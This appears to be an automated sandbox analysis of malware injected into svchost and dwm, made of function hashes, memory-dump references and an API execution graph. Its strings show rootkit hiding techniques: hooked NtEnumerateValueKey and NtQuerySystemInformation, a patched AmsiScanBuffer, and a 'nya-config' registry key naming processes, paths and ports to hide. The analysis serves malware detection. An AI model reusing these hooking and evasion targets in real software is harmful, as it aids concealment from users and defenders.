                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                          • Instruction ID: 99e5c642f4f55c8eec009b42682bbf97fdda9b94cf92ee47659fe36c31544b3d
                                                          • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                          • Instruction Fuzzy Hash: CC717F36B00B8147EA75DE369A5C3AA67D8F386FC5F480016DD4B63B89DF39C6488781
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000003.2183186665.000002A6612D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_3_2a6612d0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 3242871069-1018135373
                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction ID: 31519db6ff23ce1643a419b88b66537bc3dc62f726ee5451774d1edecf2df9ac
                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction Fuzzy Hash: CA51D032F11A408BEB54CB29E44CB6973ADEB56F98F199121DA4A43788DF7CC889D701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000003.2183186665.000002A6612D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_3_2a6612d0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: 388f23e79857dfe91b296cf6aeac947bac3dece2c659ecc246db4c5be46963c7
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: FD619432E04BC486DB719F15E44879AB7A8FB86B88F085215EB9807B95DF7CC1D4CB01
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction ID: 6477919070543908b71418fc128ff75b3537499485c48867988c523b9b399bcf
                                                          • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction Fuzzy Hash: D551C626B0478143EA24DE3AA55C3AA67D9F396F91F5C0025DD5B63B8ADF3DC408C781
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Info
                                                          • String ID: $_$6Z
                                                          • API String ID: 1807457897-202897188
                                                          • Opcode ID: f3a1ccdfc844010f6d6384e8b727e223aafffbf012ce67cb554655a4b1010233
                                                          • Instruction ID: 5dbc481eb9dbb62ce7a9338736ef3f768b688ad8dc6010521dde16ef15a8b845
                                                          • Opcode Fuzzy Hash: f3a1ccdfc844010f6d6384e8b727e223aafffbf012ce67cb554655a4b1010233
                                                          • Instruction Fuzzy Hash: 89519F32B187C08BE7218F35E08C39E7BE4F34AB45F584126E68A57A85DB7CC159CB41
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: _$6Z
                                                          • API String ID: 442123175-452956228
                                                          • Opcode ID: 9aaf26f040ad1ec26527c6482f0f95a02a03d15fd00723e3f37292bb076685c6
                                                          • Instruction ID: 49ecc0358d925df9febc49d76be15aa4082e711f62654576775220482b2729a6
                                                          • Opcode Fuzzy Hash: 9aaf26f040ad1ec26527c6482f0f95a02a03d15fd00723e3f37292bb076685c6
                                                          • Instruction Fuzzy Hash: 1E31C072B11A4087DB209F25E98D789B3A8F75AB84F984021EB4E93754EF3CC459CB01
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: _$6Z
                                                          • API String ID: 442123175-452956228
                                                          • Opcode ID: 2b49dc1147f62743d5f71a8e2f42af263b7a37484780a08d876dda563020fbab
                                                          • Instruction ID: eb630162fe33a24f5d6281626ec10f2b64d60a8839e30c3e11cec3fc7e2dbf8b
                                                          • Opcode Fuzzy Hash: 2b49dc1147f62743d5f71a8e2f42af263b7a37484780a08d876dda563020fbab
                                                          • Instruction Fuzzy Hash: 5E31D432B14A808BE7109F25E58D389B7A8F35AB80F984021EA4F93715DF3CC419C701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastModuleName
                                                          • String ID: _$6Z
                                                          • API String ID: 2776309574-452956228
                                                          • Opcode ID: afd8fe68969716b5af19fc5389df831274dd0723d0692592c9853f2af0341627
                                                          • Instruction ID: ef7ccb93359cf4a03a3856de02cdd955765d71d88785fc35618747266aa0e613
                                                          • Opcode Fuzzy Hash: afd8fe68969716b5af19fc5389df831274dd0723d0692592c9853f2af0341627
                                                          • Instruction Fuzzy Hash: 1B318432714B808BE760CB26E44C79E77E8F386B95F584125DA8D57A98DF3CC548CB82
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction ID: 8868535241417ff7c8f5628e2c49a4153ef295f723a1763fb6d4bcb3b3db57a0
                                                          • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction Fuzzy Hash: F5113432714B8082EB248F25E408349B7E9F789B84F584224EA8E17B68DF3CC555CB40
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction ID: fd7cdbad17168123059f6f9e7801b7036e0f5ea417c522ca255d78abc129a934
                                                          • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction Fuzzy Hash: 25117921B01B8082EA15DB66A80D25A77B4F78AFC4F5C4028DE4E63725EF3CC4468340
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction ID: 8ecaae86ea8fbf70443afad6dbac2875710af732eced0fa57f94f4f3f176b8a9
                                                          • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction Fuzzy Hash: 8FE06531B01A049BEB298F62E80D34936E5FB8AF05F48C024CD0A07360EF7D849D8B81
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction ID: e7f8ee257ebe65d437686030ab6f09756bf5f825d091dd1b30df11599fbc06c6
                                                          • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction Fuzzy Hash: 1EE0ED71B115049BEB199B62D80D25976A5FB8AF15F488034C90A07310EF3C849D9711

                                                          Execution Graph

                                                          Execution Coverage:1.4%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:111
                                                          Total number of Limit Nodes:17
                                                          execution_graph 22414 2baaed91bc4 22421 2baaed91724 GetProcessHeap HeapAlloc 22414->22421 22416 2baaed91bda SleepEx 22417 2baaed91724 50 API calls 22416->22417 22419 2baaed91bd3 22417->22419 22419->22416 22420 2baaed9159c StrCmpIW StrCmpW 22419->22420 22472 2baaed919b0 12 API calls 22419->22472 22420->22419 22473 2baaed91264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22421->22473 22423 2baaed9174c 22474 2baaed91000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22423->22474 22425 2baaed91754 22475 2baaed91264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22425->22475 22427 2baaed9175d 22476 2baaed91264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22427->22476 22429 2baaed91766 22477 2baaed91264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22429->22477 22431 2baaed9176f 22478 2baaed91000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22431->22478 22433 2baaed91778 22479 2baaed91000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22433->22479 22435 2baaed91781 22480 2baaed91000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22435->22480 22437 2baaed9178a RegOpenKeyExW 22438 2baaed919a2 22437->22438 22439 2baaed917bc RegOpenKeyExW 22437->22439 22438->22419 22440 2baaed917e5 22439->22440 22441 2baaed917fb RegOpenKeyExW 22439->22441 22487 2baaed912b8 16 API calls 22440->22487 22443 2baaed91836 RegOpenKeyExW 22441->22443 22444 2baaed9181f 22441->22444 22447 2baaed9185a 22443->22447 22448 2baaed91871 RegOpenKeyExW 22443->22448 22481 2baaed9104c RegQueryInfoKeyW 22444->22481 22445 2baaed917f1 RegCloseKey 22445->22441 22488 2baaed912b8 16 API calls 22447->22488 22450 2baaed91895 22448->22450 22451 2baaed918ac RegOpenKeyExW 22448->22451 22489 2baaed912b8 16 API calls 22450->22489 22455 2baaed918e7 RegOpenKeyExW 22451->22455 22456 2baaed918d0 22451->22456 22453 2baaed91867 RegCloseKey 22453->22448 22459 2baaed91922 RegOpenKeyExW 22455->22459 22460 2baaed9190b 22455->22460 22490 2baaed912b8 16 API calls 22456->22490 22457 2baaed918a2 RegCloseKey 22457->22451 22463 2baaed91946 22459->22463 22464 2baaed9195d RegOpenKeyExW 22459->22464 22462 2baaed9104c 6 API calls 22460->22462 22461 2baaed918dd RegCloseKey 22461->22455 22468 2baaed91918 RegCloseKey 22462->22468 22465 2baaed9104c 6 API calls 22463->22465 22466 2baaed91998 RegCloseKey 22464->22466 22467 2baaed91981 22464->22467 22469 2baaed91953 RegCloseKey 22465->22469 22466->22438 22470 2baaed9104c 6 API calls 22467->22470 22468->22459 22469->22464 22471 2baaed9198e RegCloseKey 22470->22471 22471->22466 22473->22423 22474->22425 22475->22427 22476->22429 22477->22431 22478->22433 22479->22435 22480->22437 22482 2baaed911b5 RegCloseKey 22481->22482 22483 2baaed910bf 22481->22483 22482->22443 22483->22482 22484 2baaed910cf RegEnumValueW 22483->22484 22485 2baaed91125 22484->22485 22485->22482 22485->22484 22486 2baaed9114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 22485->22486 22486->22485 22487->22445 22488->22453 22489->22457 22490->22461 22491 2baaed941f9 22494 2baaed94146 _invalid_parameter_noinfo 22491->22494 22492 2baaed941b0 22493 2baaed94196 VirtualQuery 22493->22492 22493->22494 22494->22492 22494->22493 22495 2baaed941ca VirtualAlloc 22494->22495 22495->22492 22496 2baaed941fb GetLastError 22495->22496 22496->22494 22498 2baaed95c8d 22500 2baaed95c94 22498->22500 22499 2baaed95cfb 22500->22499 22501 2baaed95d77 VirtualProtect 22500->22501 22502 2baaed95da3 GetLastError 22501->22502 22503 2baaed95db1 22501->22503 22502->22503 22504 2baaed91e3c LoadLibraryA GetProcAddress 22505 2baaed91e62 SleepEx 22504->22505 22506 2baaed91e6f 22504->22506 22505->22505 22507 2baaed9f370 VirtualProtect 22508 2baaed92c80 TlsGetValue TlsGetValue TlsGetValue 22509 2baaed92cd9 22508->22509 22510 2baaed92d51 NtEnumerateValueKey 22508->22510 22509->22510 22513 2baaed92ce1 22509->22513 22511 2baaed92d4c 22510->22511 22516 2baaed92d86 22510->22516 22512 2baaed92d2d NtEnumerateValueKey 22512->22511 22512->22513 22513->22511 22513->22512 22514 2baaed92e06 TlsSetValue TlsSetValue TlsSetValue 22513->22514 22519 2baaed93f88 22513->22519 22514->22511 22515 2baaed92da0 NtEnumerateValueKey 22515->22516 22516->22511 22516->22514 22516->22515 22518 2baaed93f88 StrCmpNIW 22516->22518 22518->22516 22520 2baaed93f95 StrCmpNIW 22519->22520 22521 2baaed93faa 22519->22521 22520->22521 22521->22513 22522 2baaed96430 22523 2baaed9643d 22522->22523 22524 2baaed96449 22523->22524 22525 2baaed9655a 22523->22525 22526 2baaed9647e 22524->22526 22530 2baaed964cd 22524->22530 22528 2baaed9663e 22525->22528 22529 2baaed96581 VirtualProtect FlushInstructionCache 22525->22529 22527 2baaed964a6 SetThreadContext 22526->22527 22527->22530 22531 2baaed9665e 22528->22531 22540 2baaed94b20 VirtualFree 22528->22540 22529->22525 22541 2baaed95530 GetCurrentProcess 22531->22541 22533 2baaed96663 22535 2baaed966b7 22533->22535 22536 2baaed96677 ResumeThread 22533->22536 22545 2baaed98070 8 API calls 2 library calls 22535->22545 22537 2baaed966ab 22536->22537 22537->22533 22539 2baaed966ff 22540->22531 22542 2baaed9554c 22541->22542 22543 2baaed95593 22542->22543 22544 2baaed95562 VirtualProtect FlushInstructionCache 22542->22544 22543->22533 22544->22542 22545->22539

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Value$Enumerate
                                                          • String ID:
                                                          • API String ID: 3520290360-0
                                                          • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction ID: c17fc73092cb7f9d9c5f7f478056b41bb10391d77da142dc39f8b91a468cbae2
                                                          • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction Fuzzy Hash: 2E519F3661461187E764DB1AF848A5AB3B0F788B84F704119DE8E43B94EF3ACD45CB52

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-3572789727
                                                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction ID: e959e7dba3d1213401c226c67d94ee33ff2d09aaf45d9f415137de1aff4ce438
                                                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction Fuzzy Hash: 85716D76310E5096EB10AF31EC9869D33B4FB84B88F611215DE8E47B68EF39C954C361

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 1735320900-4225371247
                                                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction ID: 6fded096c6e55d1cfa3196d5c94e029645e025300846ba3a50656a32652ddacc
                                                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction Fuzzy Hash: 1E5199A0210A4AA5FB00EFA8FD4C7D47331B740394FA45517948D139B5EF7A8A6AC3B3

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                          • API String ID: 740688525-1880043860
                                                          • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction ID: 7fcb2a61d369904f0f6f6f5100c1a8eef03d03cad35295a1c4a8f71840c3eb15
                                                          • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction Fuzzy Hash: E351C221701B4451EE249B56AC083A933B0BB48BB0F680B259EBD47BD0FF39D955C762

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
